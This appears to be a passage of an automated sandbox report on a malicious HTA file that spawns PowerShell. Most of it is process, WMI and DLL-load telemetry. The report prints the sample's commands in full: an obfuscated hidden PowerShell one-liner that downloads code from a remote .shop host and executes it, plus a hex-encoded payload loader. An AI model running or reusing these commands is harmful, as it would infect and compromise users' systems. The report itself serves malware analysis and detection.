Source: 4.2.powershell.exe.7510000.2.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)

Source: classification engine

Classification label: mal100.troj.spyw.evad.winHTA@9/6@2/2

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 8_2_00436BF0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

8_2_00436BF0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3128:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7084:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bd2z3mf3.voi.ps1

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process

Source: C:\Windows\SysWOW64\mshta.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\web44.mp4.hta"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function edSX($vXCW){return -split ($vXCW -replace '..', '0x$& ')};$lUxv = edSX('A31F9B9673349AFE3B35F831884A152ADF6EC95559396B5F57D0E445E50347CF7164B0CDC68178F82B54654182EB897B5224571B2475EFD970B415458A7AF789FC1E6F7ABBFF5A67EBB9C103A46965E4B312951120DDD87FDAA3DC376F7EB96A063404F5B45999454184A2BBA29F2CB28EA21A2DA856B254CC0F3BFD7FBCDF179A40AF3A54D7A9C674CC8BB41E0C4FD97C7113C648A150674D11EC4AD48559848466FBB95FE08C8526FBFA39058B783166A23AE29F4DA0CF61DC080DFC185C0793C8E21A60AF85E83785E482739FE2AF207C5F01D57E37973B829781481ABDCE8569691AFD4276B4F5A07138F03A1BEA59CD80A67D128F1F59B5F08CD14560906ADC8FC07ECEACD2CA936BF14DD67C0C322A614DA8949AAE4F3F3DD8C4963919366C68E97BE23A086EA39D6E3567274098AE593624ACBD21A7AA02CDE0168602BEA805BA25CAB6368F6F34EA5F73DE61B4BD7C0CA3FF765FEE92A3FF56F66AC139EA96B5A4189ECC7256D4AEBE2026C1ACAFA195958FBE0CF912FEE6E99CA63092E010DF6B7742F3AC98BBD4B06F22EC971C9EC6E3ABCB27953F51DF704695B061AC6BEC33C1B700DBA4BB023B15DA076C042FAA3A95A07706C8AE7E88553450F62468B509FEA6D5CB4350A584FBB2D977F158D34857F26CCC849BE780CB8166B92B610B64C3334FCE35D8F1F478230DAE6C3E86CF93844296A874DEEC71EC4B6694A2AD0018F51C2572849BC046EAC16B467EAB7E6229F03DC638AA510B63A4EBACB32766940CCE7DAF1FCF4F63C76BE1C97A0A09F5362D2D1417AF18230B809ACD1D1F225F4EFC165C55A8BC086346DC9D3715EC116DE095878D1134ADD3C14DC8125EB0D61BEC915BCE4B6FB0EF0A1BDBBE7E3A1F66B8842FC06096AF4E459E3AB4313C4793DCA582EC173E0DAC64534C8B839898A145779CF154674C0AE6F37B54D6B4B13E79735CC2476D5784F96960B10D71A61AB4B67A58B61390249E457FF1005BEB7ACF7A43EE2768E04D4F6FEF537A461B936EE4C0D1808455EBC1927A1E4FC80E91C69F015D288EC31966605CA3FAC7BDFE119B9780C54C172AB01029519B661359B035D477BFE75C71BA1D61A3FD4C7C56A2E76386F7B937A5DDE32CCE6982DEE8E464B2F0D40D595F50EC1801407ADB67F18011AE692B6F0BAA0465ACC91F95CC572304B79D3582A2AEA5F4453DFA1D7E39F5531233C6359F55D33BE19A911559F608653DFD08BBAF79AF2B0917D6EEBE46595756FB41358F33598CCF1E7BE52592115909F9E75477B49B50BA1E60CFBAECFE4AAF4141B07F42C5D596954C405EB172D697BDC63DCEBF8001CA89829E354D2DA20DC9739369899AF53E537DA7B73870831EEFEF889845BBDCF9501654607CF133DCDB9D67420AFC78AA9092BD52A145B944360F0BFECDC7D4932028F16E87771AC1D866EBEC7289803D86ED9904AFDFBFBF5BB048929DB7DB2AC8F63C7EDB203F8E1A174EBE2157AE182E3DBDED3349D83D3D3BC6745E2D5DF17346843FF66DB2BDFC5716E26800477742AF6898AD106316D2237BE4FADEE711172BE9B793AFE378904EC0F53DEE91616E5612EDE3DFB0863A38BAEFACED7F01D988DDCA3304F15DB3A3C71E8CA78B9035B71F7D878AE021C1C142705EC1CBA01FF772D3D880B207B97552700D5D050FE7D8F10D439FF89CEC8E7F26390CBB53F8B2F2E00092A567DDCE5162D4A1597C086F61B398754D709679F2E64B246D6B19AA8BCC08D2AA9B4B391B538D4260FF70CCD920892870858B847D56EAE7A4C64CD4F4C47355F52A842C2647543A4410AB6F0BB68693D79D2DC1A5FAF21241F5C66270CDE2DDD2DEF48DA7DA406D1A0A40075E041A292A5BEAAD267D3D4ED90575F605397391B20AF0B0020D8533E080691845C6A97A37F6782F4C741D9A038423C502F9B4B92EE6E0B4478D1356F52573E4DE57496D7A6B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command SI Variable:\s9q 'https://cdn1.klipbazyxui.shop/web44.dle';Set-Variable d47 ([Net.WebClient]::New());.(GV xect).Value.(((GV xect).Value\|Get-Member)[6].Name).(((GV xect).Value.(((GV xect).Value\|Get-Member)[6].Name)\|Get-Member\|?{$_.Name-ilike'd'}).Name)((GV xect).Value.(((GV xect).Value\|Get-Member)[6].Name).GetCommandName('In-Exion',$TRUE,$TRUE),[System.Management.Automation.CommandTypes]::Cmdlet)(LS Variable:d47).Value.(((([Net.WebClient]::New()\|Get-Member)\|?{$_.Name-ilike'Dg'}).Name))((Get-Variable s9q -ValueOn))
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function edSX($vXCW){return -split ($vXCW -replace '..', '0x$& ')};$lUxv = edSX('A31F9B9673349AFE3B35F831884A152ADF6EC95559396B5F57D0E445E50347CF7164B0CDC68178F82B54654182EB897B5224571B2475EFD970B415458A7AF789FC1E6F7ABBFF5A67EBB9C103A46965E4B312951120DDD87FDAA3DC376F7EB96A063404F5B45999454184A2BBA29F2CB28EA21A2DA856B254CC0F3BFD7FBCDF179A40AF3A54D7A9C674CC8BB41E0C4FD97C7113C648A150674D11EC4AD48559848466FBB95FE08C8526FBFA39058B783166A23AE29F4DA0CF61DC080DFC185C0793C8E21A60AF85E83785E482739FE2AF207C5F01D57E37973B829781481ABDCE8569691AFD4276B4F5A07138F03A1BEA59CD80A67D128F1F59B5F08CD14560906ADC8FC07ECEACD2CA936BF14DD67C0C322A614DA8949AAE4F3F3DD8C4963919366C68E97BE23A086EA39D6E3567274098AE593624ACBD21A7AA02CDE0168602BEA805BA25CAB6368F6F34EA5F73DE61B4BD7C0CA3FF765FEE92A3FF56F66AC139EA96B5A4189ECC7256D4AEBE2026C1ACAFA195958FBE0CF912FEE6E99CA63092E010DF6B7742F3AC98BBD4B06F22EC971C9EC6E3ABCB27953F51DF704695B061AC6BEC33C1B700DBA4BB023B15DA076C042FAA3A95A07706C8AE7E88553450F62468B509FEA6D5CB4350A584FBB2D977F158D34857F26CCC849BE780CB8166B92B610B64C3334FCE35D8F1F478230DAE6C3E86CF93844296A874DEEC71EC4B6694A2AD0018F51C2572849BC046EAC16B467EAB7E6229F03DC638AA510B63A4EBACB32766940CCE7DAF1FCF4F63C76BE1C97A0A09F5362D2D1417AF18230B809ACD1D1F225F4EFC165C55A8BC086346DC9D3715EC116DE095878D1134ADD3C14DC8125EB0D61BEC915BCE4B6FB0EF0A1BDBBE7E3A1F66B8842FC06096AF4E459E3AB4313C4793DCA582EC173E0DAC64534C8B839898A145779CF154674C0AE6F37B54D6B4B13E79735CC2476D5784F96960B10D71A61AB4B67A58B61390249E457FF1005BEB7ACF7A43EE2768E04D4F6FEF537A461B936EE4C0D1808455EBC1927A1E4FC80E91C69F015D288EC31966605CA3FAC7BDFE119B9780C54C172AB01029519B661359B035D477BFE75C71BA1D61A3FD4C7C56A2E76386F7B937A5DDE32CCE6982DEE8E464B2F0D40D595F50EC1801407ADB67F18011AE692B6F0BAA0465ACC91F95CC572304B79D3582A2AEA5F4453DFA1D7E39F5531233C6359F55D33BE19A911559F608653DFD08BBAF79AF2B0917D6EEBE46595756FB41358F33598CCF1E7BE52592115909F9E75477B49B50BA1E60CFBAECFE4AAF4141B07F42C5D596954C405EB172D697BDC63DCEBF8001CA89829E354D2DA20DC9739369899AF53E537DA7B73870831EEFEF889845BBDCF9501654607CF133DCDB9D67420AFC78AA9092BD52A145B944360F0BFECDC7D4932028F16E87771AC1D866EBEC7289803D86ED9904AFDFBFBF5BB048929DB7DB2AC8F63C7EDB203F8E1A174EBE2157AE182E3DBDED3349D83D3D3BC6745E2D5DF17346843FF66DB2BDFC5716E26800477742AF6898AD106316D2237BE4FADEE711172BE9B793AFE378904EC0F53DEE91616E5612EDE3DFB0863A38BAEFACED7F01D988DDCA3304F15DB3A3C71E8CA78B9035B71F7D878AE021C1C142705EC1CBA01FF772D3D880B207B97552700D5D050FE7D8F10D439FF89CEC8E7F26390CBB53F8B2F2E00092A567DDCE5162D4A1597C086F61B398754D709679F2E64B246D6B19AA8BCC08D2AA9B4B391B538D4260FF70CCD920892870858B847D56EAE7A4C64CD4F4C47355F52A842C2647543A4410AB6F0BB68693D79D2DC1A5FAF21241F5C66270CDE2DDD2DEF48DA7DA406D1A0A40075E041A292A5BEAAD267D3D4ED90575F605397391B20AF0B0020D8533E080691845C6A97A37F6782F4C741D9A038423C502F9B4B92EE6E0B4478D1356F52573E4DE57496D7A6B	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command SI Variable:\s9q 'https://cdn1.klipbazyxui.shop/web44.dle';Set-Variable d47 ([Net.WebClient]::New());.(GV xect).Value.(((GV xect).Value\|Get-Member)[6].Name).(((GV xect).Value.(((GV xect).Value\|Get-Member)[6].Name)\|Get-Member\|?{$_.Name-ilike'd'}).Name)((GV xect).Value.(((GV xect).Value\|Get-Member)[6].Name).GetCommandName('In-Exion',$TRUE,$TRUE),[System.Management.Automation.CommandTypes]::Cmdlet)(LS Variable:d47).Value.(((([Net.WebClient]::New()\|Get-Member)\|?{$_.Name-ilike'Dg'}).Name))((Get-Variable s9q -ValueOn))	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: jscript9.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
